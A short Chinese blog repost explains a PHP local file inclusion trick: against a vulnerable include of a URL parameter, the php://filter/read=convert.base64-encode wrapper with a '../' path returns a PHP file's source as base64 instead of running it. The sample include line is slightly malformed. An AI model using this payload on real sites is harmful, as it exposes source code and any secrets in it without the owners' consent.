<?php include['a'] ?>
a.com/a.php?a=../0x007.php 如果是这样写的 会当作php来执行 并不会看到源码。
今天我所说的是 不让0x007.php执行 看到的是0x007.php的源码
利用php:filter//来读取
php://filter/read=convert.base64-encode/resource=../0x007.php 这样读取出来是源码 不进行执行。
转载于:https://blog.51cto.com/0x007/1220733